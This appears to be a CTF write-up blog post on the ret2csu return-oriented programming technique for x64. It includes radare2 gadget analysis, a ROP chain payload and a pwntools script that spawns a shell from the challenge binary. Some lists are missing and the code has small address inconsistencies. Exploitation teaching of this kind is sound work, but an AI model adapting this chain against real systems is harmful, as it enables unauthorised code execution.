ROP On x64: What's ret2csu Again?

August 29, 2019
exploiting rop radare2 r2 ctf ret2csu

Based on the Stop, ROP, n’, Roll challenge from this year’s Redpwn CTF, this post will explain how to make system calls on x64 using ROP in order to spawn a shell. Also, it shows how to abuse writable memory regions of a process to overcome difficulties with some ROP gadgets. And the best thing is, two of the gadgets used in this writeup are universal and most likely also present in your x64 target if it’s using glibc. Of course, everything will be done with radare2 and pwntools.

The challenge binary can be found here.

ret2csu Basics

The ret2csu technique, which has been presented at Black Hat Asia in 2018, is based on two specific ROP gadgets that are present in the __libc_csu_init() function. Lets’ quote the authors of the ret2csu paper to explain why this function is even there:

The problem appears when an application is Dynamically compiled, which represents 99% of all applications. More precisely when the linker “attaches code” to the ELF executable that is not coming from the source code of the application. In other words the resulting ELF executable contains not only the compiled source code from the application but already compiled code from statically linked libraries “.a” and object files “.o” even when it is dynamically compiled.

In other words, if a binary is dynamically linked and it’s using glibc, these gadgets will be present – even if it’s only a simple Hello World application. These gadgets can be handy in order to populate certain registers and alter the program flow. Moreover, the gadgets will always be mapped since __libc_csu_init() is getting executed before main(). There’s a lot more to this exploitation technique and to fully understand it I recommend checking out the original paper linked above.

Ok So What Are Those Gadgets?

It seems that the structure of the first gadget varies depending on the compiler version. I’ve found quite a few variations of it, so it’s always worth a check. Below you can find the first gadget as found in the challenge binary:

mov rdx, r15
mov rsi, r14
mov edi, r13d
call qword [r12 + rbx*8]

And the Second one is:

pop rbx
pop rbp
pop r12
pop r13
pop r14
pop r15

Cool.

Let’s analyze the challenge binary before finding a way to make use of those gadgets.

The Target

Upon executing the binary, it asks for an input:

[#] number of bytes:

The input is being read by the target using the function get_int() which uses scanf() in combination with the %zu format string internally. This basically gets an unsigned integer from the user input. An interesting thing to notice is that the user input serves as a parameter for the following read() call:

call sym.get_int # get integer, sets RAX to result value
mov qword [fildes], rax
mov rax, qword [fildes]
mov ecx, eax
lea rax, [buf]
mov edx, 0x186a0 # size
mov rsi, rax # *buf
mov edi, ecx # file descriptor
call sym.imp.read

This means that in order to input additional data via read(), the file descriptor has to be 0 which corresponds to STDIN. Using this read() call it’s possible to overflow buf which resides at RBP - 0x9. The overflow happens after 17 bytes, as determined by passing a De Bruijn pattern using ragg2 -r -P 100.

First, set a breakpoint in read() at the ret instruction. Using this breakpoint it’s possible to check what’s about to be loaded into the instruction pointer:

[0x7fda3bd53338]> pxr @rsp # Check what's on the top of the stack
0x7fff9bea9518 0x4941414841414741   AGAAHAAI @rsp ascii ('A') # This will be loaded into the instruction pointer
0x7fff9bea9520 0x41414b41414a4141   AAJAAKAA ascii ('A')
[...]
[0x7fda3bd53338]> wopO 0x4941414841414741 # Search for this value in the passed pattern
17

Now that the instruction pointer is under control, it’s necessary to develop a plan for the exploitation. While digging around in the binary, the following things can be found:

Combining these two aspects suggests that a shell can be spawned using a system call somehow. Therefore something like execve("/bin/sh", 0, 0) could potentially be executed.

Building The ROP Chain

The execve system call takes three parameters. This means the registers have to be set up in the following way:

Finding The Gadgets

Ok so what about RDX?

Unfortunately this register is not zero after processing a ROP chain that could exploit the binary, so this has to be set to zero manually.

Of course, the __libc_csu_init() function is also present in this x64 binary. It contains both ret2csu gadgets mentioned before:

Sure enough, the first gadget can be used to set RDX using r15, which in turn can be controlled with the second gadget.

There’s only one problem: The call qword [r12 + rbx*8] instruction at the end of the first gadget will fail in case r12 isn’t set up properly, since this register may point into some weird memory locations we can’t call into. The RBX register is zero at the point of executing this instruction, so this doesn’t have to be addressed.

Dealing With The Call Instruction

Since r12 is under control using the second ret2csu gadget, we only have to find a fitting memory location to jump to that doesn’t break the program flow. It makes sense to let the call instruction jump to the syscall gadget since all registers can be set accordingly up to this point. These things are known now:

With all these things combined, a call to scanf("%zu", 0x602000) could solve this problem. The pwntools library will be utilized to send the address of the syscall gadget into the target process after calling scanf() with the ROP chain.

Getting The Syscall Number

One last thing: The execve system call itself is identified by the number 59. This number has to be loaded into RAX before jumping to the syscall gadget.

Reading a number is what the application does when executing it normally. It uses get_int() for this:

[0x00400600]> pdf@sym.get_int
/ (fcn) sym.get_int 43
|   sym.get_int ();
|           ; var int32_t var_8h @ rbp-0x8
|           ; CALL XREF from main @ 0x400790
|           0x00400710      55             push rbp
|           0x00400711      4889e5         mov rbp, rsp
|           0x00400714      4883ec10       sub rsp, 0x10
|           0x00400718      488d45f8       lea rax, [var_8h]
|           0x0040071c      4889c6         mov rsi, rax
|           0x0040071f      488d3d2c0500.  lea rdi, [0x00400c52]
|           0x00400726      b800000000     mov eax, 0
|           0x0040072b      e8c0feffff     call sym.imp.__isoc99_scanf
|           0x00400730      e8abfeffff     call sym.imp.getchar
|           0x00400735      488b45f8       mov rax, qword [var_8h] # RAX = Result
|           0x00400739      c9             leave
\           0x0040073a      c3             ret

The integer that’s being read is stored in RAX which is just what’s required to call execve at this point.

Ok How To Build The ROP Chain?

Like this:

  1. Write the address of the syscall gadget into the writable memory region (0x60200) with scanf().
  2. Get the execve system call number (59) into RAX with get_int().
  3. Setup the registers with the POP-gadget: Load the address of /bin//sh and the address of the writable memory region (0x60200).
  4. Execute the jump-to-syscall gadget
  5. Have a shell

Or in code:

BINSH = p64(0x400c49)
SYSCALL = str(0x400703)
JUMP_TO_SYSCALL = p64(0x00400800)
POP_RDI = p64(0x400823)
POP_RSI_r15 = p64(0x00400821)
GET_INT = p64(0x00400710)
SCANF = p64(0x004005f0)
RET = p64(0x00400831)
POP = p64(0x0040081c)

PAYLOAD = ""
PAYLOAD += "A" * PADDING # 17

# Setup the parameters for scanf("%zu", 0x60200)
PAYLOAD += POP_RDI
PAYLOAD += p64(0x00400c52)  # format string for scanf()
PAYLOAD += POP_RSI_r15
PAYLOAD += p64(0x602000)  # rw region
PAYLOAD += p64(0x0) # we don't care about r15 now

# Call scanf()
PAYLOAD += p64(elf.sym["__isoc99_scanf"])

# Get the system call number of execve (59) into RAX
PAYLOAD += RET
PAYLOAD += GET_INT

PAYLOAD += POP
PAYLOAD += p64(0x602000) # r12 (for CALL in JUMP_TO_SYSCALL gadget)
PAYLOAD += BINSH # r13 (will be RDI via JUMP_TO_SYSCALL gadget)
PAYLOAD += p64(0x0) # r14 (will be RSI via JUMP_TO_SYSCALL gadget)
PAYLOAD += p64(0x0) # r15 (will be  RDX via JUMP_TO_SYSCALL gadget)

PAYLOAD += RET
PAYLOAD += p64(JUMP_TO_SYSCALL)

Exploitation With pwntools

The exploited process reads user input four times:

  1. The file descriptor: 0 for STDIN
  2. The actual ROP payload
  3. The address of the syscall gadget via scanf()
  4. The system call number of execve via get_int()

Because of this, the exploitation has to be automated with pwntools as follows:

p = process("./srnr")

p.sendline("0")
p.sendline(PAYLOAD)
p.sendline(SYSCALL) # Address of the syscall gadget
p.sendline("59")

p.interactive()

Here’s a demo of the exploit, starting from the last ROP gadget:

ret2csu Demo

That’s it.

In-Process Fuzzing With Frida

October 24, 2019
frida exploiting fuzzing reverse-engineering

How Not To Suck At r2wars

October 1, 2019
radare2 r2 r2wars

Dynamic Instrumentation: Frida And r2frida For Noobs

September 13, 2019
radare2 r2 frida r2frida ctf reverse-engineering